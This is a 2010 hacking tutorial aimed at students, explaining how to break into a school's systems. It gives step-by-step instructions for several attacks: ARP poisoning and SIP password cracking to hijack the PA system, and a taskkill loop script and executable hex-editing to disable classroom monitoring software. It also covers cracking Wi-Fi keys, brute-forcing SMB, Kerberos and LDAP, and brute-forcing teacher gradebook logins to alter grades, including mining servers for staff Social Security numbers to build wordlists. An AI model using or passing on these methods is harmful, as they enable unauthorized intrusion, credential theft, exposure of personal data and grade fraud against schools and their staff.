Disclaimer: This tutorial is for information purposes only, and I do not endorse any of the activities discussed within
this guide. I nor anyone hosting this guide can be held responsible for anything you do after reading this. What you do with your day lies on your shoulders. So keep the subpoenas out of my mailbox, thank ya much. Section 1: The Introduction ---------------------------Greets and meets. Well I started off this year (2010) with an update to one of my tutorials and with no original article ideas in mind I thought it's as good a time as ever to clean this article up a bit, and give it a needed update. I got some positive response from the last edition, but the problem is I copypasted many of the parts from the first edition release and it really shows when you read through it. Anywho, so yeah besides the phreak intro guides the school theme is one I've used a lot in past tutorials. Mostly just cause I remember being an 8th grade n00b trying to find some information that I could relate to the school network. There was nothing around, and even now most of the school texts circulating are pretty lame. Eventually as I learned more it was the network at my high school where I really got my newby little flippers wet in it all. Err, not to say go pwn your school or anything, after all this guide is for information purposes only and all that good shit. Still something fun to ponder over. =) Well anyways, blah blah, lets get on with it.. Section 2: Hijacking the PA System ----------------------------------Well as in the last edition I'm going to start off this guide with how to hijack the PA system. In the previous edition I discussed trying to social engineer one of the office peoples into patching you through to the PA extension, and how to hardwire yourself into the PBX to patch yourself through. Oh take note in case you didn't know PBX stands for Private Branch eXchange, and is the internal phone network your school uses to tie together all those phones. Anywho the problem with that is that the first one would most likely not work (even those desk jockies are going to wonder why you would really need to be patched through to fix some "crash at the central office"), and the second one is way too risky for too little reward. Thankfully nowadays every school has a voip PBX running, which actually makes your job a bit easier. I already talked about much of what follows in Phones & Tones: Second Edition, but since you might not be interested in phreaking all together I'm going to be repeating myself a bit in order to keep all the relevant information here. So anyways for this I will assume you have a laptop (if you don't, none of this section applies to you) so you will want to download Cain & Abel.. www.oxid.it/cain.html Now a good thing to note from here is that despite the fact that any school PA system is tied in with voip PBXs they still function basically the same as they used to with analog PBXs. Whenever someone needs to call Sally GoCutsHerself into the main office so her parents can pick her up or needs to announce some morning crap over the intercom they pick up the phone and dial an extension to access the PA system. From here I will assume you have a softphone downloaded and a decent mic or headset to use. If you don't have a softphone you can download X-Lite below.. www.counterpath.com/x-lite-download.html Now to get that PA system extension. For this you will need to crack open your laptop and catch an announcement as it's being issued. You can try this during lunch. If your school allows you to just open your laptop up while you're eating, or if not you can just get in your or a friend's car in the parking lot during your lunch break and try it then. Hell even give yourself a skip day and have all day to fuck around..well, assuming you can find yourself a spot close enough to the school to get on their WiFi without getting busted for skipping. I'm going to assume from here that there is both a wireless access point and you have access to it. How to crack the key if it's protected will be linked later so for right now lets just go on with how to get access to the PA system. Now open up Cain & Abel, and set yourself up an ARP poison route. First go to Configure, select your network card, and click OK. Now click the + sign, and this will bring up the MAC
Address Scanner. "All hosts in my subnet" should already be active so just click OK. Then click the + sign again and you'll see a list of hosts on the left side of the window. Highlight all of them, and all the hosts on the right side. Then just click OK again and you're set. You can watch all the calls coming over from the SIP tab so keep an eye on the To and From fields. As soon as an announcement comes on check to see the call that came through at that same time and you should see the user that placed it, and the username/extension number for the PA extension. It should be somewhat obvious to identify since most schools are going to base most the usernames on the name of the user. Say the first name and last initial, or first initial and last name of the staff/teacher/whatever. On the other hand the PA system will have a much different username. Of course this scheme might not apply to your school, but it happens enough to be mentioned. You can also if you want just go into the office right before they send an announcement and pay close attention to what extension they hit to get to the PA system, or even look at one of the phones themselves for the extension number (there's usually an extension list by the dial pad, just find a reason to be close enough to scan over it). Alternatively you can just try using this list of common extensions.. www.totse2.net/text-files/strphnext.htm Now that you have the PA system extension to call you will need to get access to a user to call it from. What you will first want to do is find the SIP server. What we will be using for this is SiVuS, which has an entire suite of tools for all your voip needs.. www.vopsecurity.org So open SiVuS, go to SIP Component Discovery, in the "Target network" field enter 192.168.1.1-254 (or whatever the network range is), and then just click Scan. Let that play through and you should find the SIP server fairly quickly (UDP port 5060). So go back over to Cain & Abel. Hopefully at this point you've let it run long enough to have a decent list of users to attempt to crack into. So from the Sniffer tab click over to the Passwords tab at the bottom of the window, and then from the scroll bar select SIP. At this point you should see a list of password hashes so just right click on one of them and select the dictionary crack. A good thing to note here is a popular default password on PBXs is for the pass to be either the same as the username or the extension number so throwing both into your word list would probably be a good idea. There are some options to use with your word list like reverse, double, numbered, etc so just select your word list and let it rip. This is a good time to be doing this during a skip day so you can just take your work home with you and run the cracker through all the hashes you grabbed until something clicks (one of the many advantages of passive cracking). So from here I'll assume you have the IP for the SIP server, a user/pass to use, and the extension for the PA system. So when you're ready to give your announcement over the PA system open up X-Lite, right click, click on "SIP Account Settings..", click "Add...", fill in the appropriate info, and click OK. Now dial up the extension, and from here it's all you. Scream obscenities, play your favorite song, or whatever. Have fun with it. Section 3: Bypassing Classroom Management Software --------------------------------------------------Part 1: Intro You should be plenty familiar with this software. It controls what programs you open, what sites you visit, and at random moments lets the teacher monitor all your computering. So yeah, fuck that, it's got to go. Lets continue.. Part 2: LanSchool This is one of the most popular classroom management programs used, and it's not all that hard to bypass. One of the more direct courses of action you can take is to disable the program directly in order to leverage some freedom. The problem is of course that the program will start itself after 15 seconds after it's closed. In order to fix this problem you can create a short python script to keep the program closed.. import os, time def KillYou() os.system("taskkill /f /im student.exe") time.sleep(15) KillYou() Just run it through py2exe and take it to school on a USB stick (if py2exe fails just make a batch file that'll do the same thing). Give this script some time to run and after a bit it should produce an error, and you can just kill the script from there. You can also just run a linux live cd, drop over to the hdd, and kill the programs themselves from the computer. C:\Program Files\LANSchool\Student.exe C:\Program Files\LANSchool\StudentPower.exe This will keep it off until the next time it's reinstalled. Part 3: Vision6 This is another very popular piece of software that schools use to control activity on their computers. In previous versions of Vision it was as simple as going to C:\Program Files\Master Solution\Vision and running MEUCONF.exe. This file isn't included with Vision6, but you can download it manually below..
www.megaupload.com/?d=EIU4BIIU If the link there is down by the time you read this you can just google "meuconf.exe" to see if you can find a new link or find a torrent for earlier versions of Vision, install it on your computer, and extract MEUCONF.EXE from there (credits to doctoroctagonapus23 for the tip and download link). So drop this file to a USB stick, open it up on the computer in class, run the file & select "Run Manually?", and then just close out Vision6 from the task bar. Then there, you're done. Part 4: SMART Sync Another popular piece of classroom control is SMART Sync (formerly known as SynchronEyes). They've definitely improved their software since the older versions as far as security goes, but it's still basically the same crap as before. If you have the permissions you can try to kill the process itself by going to cmd prompt and punching in.. taskkill /f /im smartsync.exe Also you can as always drop to a linux live cd, drop over to the hdd, and kill the two files below to remove the software from the computer itself.. C:\Program Files\SmartSync Software\Smartsync Pro\Smartsync.exe C:\Program Files\SmartSync Software\Smartsync Pro\SmSrvc.exe Part 5: Additional trick This technique applies to most classroom management programs so I decided to give it a part of it's own. Most of these apps use policies to set permissions for applications. What you can access, what you can't (iexplorer.exe, cmd.exe, regedit.exe, etc). I got to give credit to Darawk from edgeofnowhere.cc for the idea. First select the program you want to open from it's program folder and copy it to the desktop. For example iexplorer.exe from C:\Program Files\Internet Explorer\, regedit.exe from c:\windows\, cmd.exe from c:\windows\system32\, etc etc. Now change the file extension from exe to txt. Then plug in your USB stick and open up a hex editor. Just google one up, there's plenty to pick from. Now open up the file you just copied to the desktop, and search for the string "Polic". This should bring you to the policies entry, which is the entry that checks the group policies to see whether you can open the file or not. Just edit one letter out of the name of the policy, save the file, and then change the extension of the file back to exe. Now run it, and since the policy check fails it will just automatically start the file. Part 6: Closing Well that should cover you for that. One thing I should mention is for killing processes you will probably need higher permissions on the OS. Just take a crack at the Windows pass using ophcrack. School computer passes usually aren't all that complicated.. http://ophcrack.sourceforge.net/download.php Section 4: Hacking the School Network -------------------------------------Well since every network is just a little different I can't give you a word to word on this, but I can at least give you some tips on how to get started. So if you don't have it already you will of course need to get NetStumbler.. www.netstumbler.com/downloads/ So just pack up your laptop, head over to your school, and see what comes up and what sort of encryption if any the access points use. If they come across encrypted then you can try your hand at cracking it with BackTrack.. www.backtrack-linux.org/downloads/ Burn it to a CD, come back around, and what you will do from here depends on the encryption used. I'll link some tutorials out of laziness.. WEP: http://thewifihack.com/blog/?p=39 WPA2: http://opsec.cotse.net/opsec/?p=1046 So from here one way or another you should have access to the network. So what now? Well from here that's pretty much up to you. A great place to start is doing some basic scans to get an idea of the network. If you for some odd reason don't have it already you can download nmap below.. http://nmap.org/download.html So open up the Zenmap GUI and select in Profile "Slow comprehensive scan" or if you're the impatient type just set it at "Intense scan plus UDP" and in Target punch in 192.168.1.1-254 or whatever the network range is. Then just click Scan and let it scan through. A great start for shits and giggles is the http servers you come across during your scan. Most will be network devices (many times with the default account still set, admin:admin), but some may be other services used by the staff tied in to the network with a web server. Just punch any you find into your browser and see what they are. Now on to more serious targets. To make any serious progress within the network you need to tackle the active
directory. For this you will first want to gather some information on the AD for your school's network. A decent tool for this is Winfingerprint, which can be downloaded below.. http://sourceforge.net/projects/winfingerprint/ This scanner can run a wide variety of checks that you would be interested in. For this scan what you will want to do is check all the scan options (minus ping and traceroute), check "SNMP Community Strings", punch in the IP range over on the top left corner of the window, and then click "Scan". Let that scan through, and ideally what you want to pull from this are the users on the network and the hosts to target. Now that you're done with that it's time to start gathering some passes. Even though SMB cracking is definitely an old tactic it still has it's place when exploring LANs. For this I would suggest using smbbf, which is included in the smbat kit.. www.cqure.net/wp/smbat You should see a list of functions to use so it should be pretty straight forward, however I will mention one thing. Unless you know the host you're targeting is some Win2k host (still remotely possible on some of the legacy systems at the school district building) you should just set -P at 0. Of course you're bound to run into a lockout limit so don't expect to run a long wordlist. A good thing to do is just write yourself a wordlist of some likely passes on the network and see what ticks. An example would be for the pass to be the same as the hostname, the workgroup, the name of the school, the name of the football team, admin, password, system, etc. If you're successful you can then just net use your way on and see what's being shared. Of course cracking SMB can be lame so lets go over some other services you may want to look into while you're scanning. The first one I have to mention is Kerberos (port 88). This is used a lot on networks and should be one of your first targets when you're exploring the network. A good choice here is a CLI set known as KerbCrack, which can be downloaded below.. http://ntsecurity.nu/toolbox/kerbcrack/ Though the name is kerbcrack it actually contains two tools, kerbcrack and kerbsniff. Kerbsniff is good for MITM attacks against 2k/XP systems. Of course 2000 isn't all that popular on networks now (thankfully), but there are still plenty of XP hosts you can try this against. You just punch in the output file and sniff the pass string as it's being sent over. The other tool, kerbcrack, is a cracker that can run either brute force or a dictionary crack against the host. As always I would suggest just running a dictionary crack, and fill it with some of the common passes (including some of the one's I mentioned before). Another choice target is LDAP (port 389). This is used for a lot of administrative functions, and is also good for enumerating more information on the network. A good choice for this and many other protocols is Hydra, which can be downloaded at.. http://freeworld.thc.org/thc-hydra/ This is of course natively for *nix, but there is a cygwin version for those allergic to any OS outside Windows. It's got a lot of options so just run the program to read through all the parameters. If you successfully snag a pass you can use an open source java LDAP browser known as Jxplorer to browse through.. http://jxplorer.org/ There's also ftp (21), ssh (22), telnet (23), snmp (161), and other ports that you will want to look into when scanning the network. Most of the telnet/ssh servers will probably as with http be network devices, but they're worth a check anyways. Hydra can equally take care of any of those other ports so you already have all you need there. Of course outside dictionary cracks and MITM attacks there's also plenty of vulnerabilities related to the software itself that you can use, but vulns come and go so I won't really get into any specifics. If you need more information on a server you come across telnet into it, and see what banner the server spits back. On most ports you should be able to grab a banner upon connect, while with others like http you will need to throw a request at it to get a response. For example with HTTP upon connecting to the server just type in HEAD / HTTP/1.1 and that should do it. Then just google the name and version and "vulnerability" (i.e search "powerschool 1.6 vulnerability"..minus the quotations), then see what you come up with. Nmap will also do a bulk of the fingerprinting itself, which should give you the chance to look into any vulnerabilities related to the version of the OS that a particular host uses. I couldn't possibly go over every possibility so you'll just have to do your homework there. Section 5: Changing Your Grades -------------------------------Part 1: Intro So now lets move on to changing your grades. As I did in the last edition I should remind you that your grades are not just on the computer, but also hard copied. So if you were to actually try any of what follows you could very well get busted by the discrepancy between the two. Part 2: Finding Usernames This should be the easiest part, but if you are to have any success with this you should gather a list of usernames for your school. By far the most common username scheme for schools to use is the first initial and last name (i.e Norman Bates becomes NBATES). Of course there are other schemes that your school may use. One you can try is to check the school web site for email addresses. You can either snag an email spider (google one) to do the work for you, look through the pages yourself, or google dork it. To do the last option there in the list just search something like "intext:@countyname.k12.stateinitial.us" (minus the quotes) and see if you get lucky. If the email search doesn't bring up any results there's still other options available to you. Scan over any faculty's desk for any notes that may have their username (and possibly even password) on it, or just skim over the screen when you see one of them logging in. All you need is to get one username to figure out the scheme and throw together a user list yourself.
Part 3: Building a Wordlist Well now that you have the user list to use you need to put together a wordlist to use. While any word list you can find on the net will do you should put in your own passes on top of what's included to make sure it can test for some common defaults. While with most gradebook options the default is usually set by the admin there are some common schemes. This includes password, Password, gradebook, Gradebook, same as username, 1234, 123456, teachers' birthdate in various ways (two digit birth month/two digit birth year for example), first 2 or 3 letters of the teacher's last name or their initials + birthdate, first 2 or 3 letters of te teacher's last name or initials + the last 4 digits of their SSN, et cetera. Out of this list incorporate into the wordlist what you can. While you may not have any teachers' SSN you can sometimes gather a list relatively easy while exploring the school's network. Many times schools will leave a list of social security numbers and their corresponding names on one of the servers on the network for accounting purposes. So just pay attention to any of the text files on any servers you manage to get even user access into to see what you can find. Part 4: PowerTeacher This is one of the more prominent gradebook wares used. It runs off a PowerSchool web server, which is probably going to be registered within the same domain as your school's website. Just type in http://ps.yourschoolsite/teachers or http://powerschool.yourschoolsite/teachers and if your school uses it one of the two should bring up the form used. From here you have multiple options. You can try to take a crack at one of the users, or try to take a crack at the server. If you want to try a crack at the users just try using Brutus, which can be downloaded below.. www.hoobie.net/brutus/ So open up Brutus and just enter the URL for the PowerTeacher login into the Target field, select "HTTP (Form)" in the Type field, click "Modify sequence", hit "Learn Form Settings" and once the right settings are loaded click OK, enter in the user list you should have filled before into "User File", make a pass list for yourself with some common passes including the name of the school; name of the football team; etc and then load that in the "Pass File", check "Use Proxy", click "Define" and enter a valid proxy, and then just click "Start". Let that play through and if you get lucky you can cop an account to login with. Of course if you don't you can still take a shot at the server itself. A good thing to first do is open up Zenmap GUI again and scan the host that the server is on itself. This will get you the banner for the web server itself, and any other servers that could be targeted to achieve access to what you want. So your first start should always be to try looking for any public vulns that you may be able to use. Just search for "servername version vulnerability" and if that doesn't work try looking for any other packages they may use on the server. Hell you can even try entering the version of PowerSchool your school uses into google and see what you find (it's had plenty of vulns here and there). If all that doesn't work you can just scrap trying the http server itself and target some of the other servers on the host using Hydra (as explained earlier) or with any public vulns that the service may be exploitable to. So lets say one way or another you got access to one of the accounts on the PowerTeacher service, what now? Click the Gradebook icon, and from here you should see the Scoresheet tab (it's a spreadsheet). Here you should see the grades for every student in their classes, which you can edit at will. Yup, no way to edit all the grades you wish without having full server access or a district admin account. Still any teacher account would be valuable to somebody.. Part 5: GradeSpeed.NET This one is actually a bit more secure than some other gradebook options used. Mostly because unlike PowerSchool and some others GradeSpeed.NET is ran off a separate server (the gradespeed site). Though no site is completely secure having the gradebook separate from the school network is actually better since a compromise of the actual network (which isn't very hard to accomplish) is still not a free reign to edit any of the grades. For this I will be repeating much of what I described in the previous section. First to locate the GradeSpeed login for your school you can try some of the URLs below.. gradespeed.yourschoolsite/gs/ gradespeed2.yourschoolsite/gs/ gs.yourschoolsite/gs/ schoolname.gradespeed.net/gs/ So from here you will see different login options for different types of accounts in the order of Teacher, Substitute, Administrator, and Parent. If you could it would be great to get an Administrator account, but since you could easily count all the admin accounts on any single school's gradebook page on one hand it's unlikely you'd do anything besides lock all the accounts. So just click Teacher, copy the URL for the login page, and enter it into Brutus the same way I described in the PowerTeacher section (no point in repeating myself). Of course one thing I have to add is that if you followed the previous section on hacking the school network and snagged any LDAP logins then you may be able to use the same username/pass logins to get on GradeSpeed.NET. So anyways once logged in you can simply click over to Grades to see a list of tables for various students and assignments. Should be obvious what to do from here so I'll close it off here. Part 6: Closing There are definitely other options, but as you see the techniques are pretty much going to run the same irregardless of the type of gradebook software used. JoomlaLMS, Pinnacle Gradebook2, Lynx.NET, TeacherEase, etc. If the software is tied in with the web server and not just tied in with the domain then you can try targeting the site itself to gain access to the databases used. I could dedicate an entire section to this topic, but there's been entirely too many guides on testing sites for common vulns as it is so if you need some information to start here check some of the milw0rm texts.. www.milw0rm.com/papers/
Section 6: The Conclusion -------------------------Well that's it for this article. I honestly had been sitting on this article unfinished for a few weeks. Other projects, old SNES games, and other rl shit distracted me just enough to honestly forget I was even writing this till a couple days ago. If you need any help that isn't something stupid like "help me hack my skool!!" or just need to get in touch with me there's some contact details below. If you send me an email or message and I don't respond to you within a few days or so I'm probably either just busy or just not interested in helping you (meaning you're asking the wrong question). Murder Mouse fuck ©opyright, 2010 pla229 [skat] gmail [rot] com http://houseofhackers.ning.com/profile/MurderMouse www.informationleak.net http://resistance.zzl.org/index.html www.totse2.net www.gonullyourself.org Yahoo! ID: murder_mouse Skype ID: murder-mouse IRC: irc.2600.net | #infoleak | nick: MurderM